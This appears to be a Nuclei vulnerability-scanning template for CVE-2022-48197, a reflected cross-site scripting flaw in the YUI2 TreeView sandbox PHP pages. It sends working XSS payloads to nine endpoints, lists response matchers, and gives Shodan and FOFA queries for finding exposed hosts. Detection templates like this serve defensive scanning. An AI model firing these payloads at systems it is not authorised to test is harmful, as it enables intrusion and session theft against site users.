Vulnerability description
Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800, in the sandbox pages up.php, sam.php, renderhidden.php, removechildren.php, removeall.php, readd.php, overflow.php, newnode2.php and newnode.php.
id: CVE-2022-48197

info:
  name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
  author: ctflearner
  severity: medium
  description: |
    Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.
  impact: |
    Attackers can inject malicious JavaScript through crafted mode parameters in multiple TreeView PHP files, potentially stealing user session tokens and performing actions on behalf of victims when they access the compromised pages.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51198
    - https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48197
    - http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html
    - https://github.com/ryan412/CVE-2022-48197/blob/main/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-48197
    cwe-id: CWE-79
    epss-score: 0.12108
    epss-percentile: 0.93605
    cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 9
    vendor: yui_project
    product: yui
    shodan-query:
      - html:"bower_components/yui2/"
      - http.html:"bower_components/yui2/"
    fofa-query: body="bower_components/yui2/"
  tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
        - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "1'\"()&%<zzz><script>alert(document.domain)</script>"
          - "widget.TreeView"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bc174cfbdf1d68f3145d84762258be1ff21542e33a3e45dd5f04403b63ab0ecd022100ecf82b6cfc12b4a06bfb9de72a8f2b3cdceb1039d8c094468bd3431f60717e2e:922c64590222798bb761d5b6d8e72950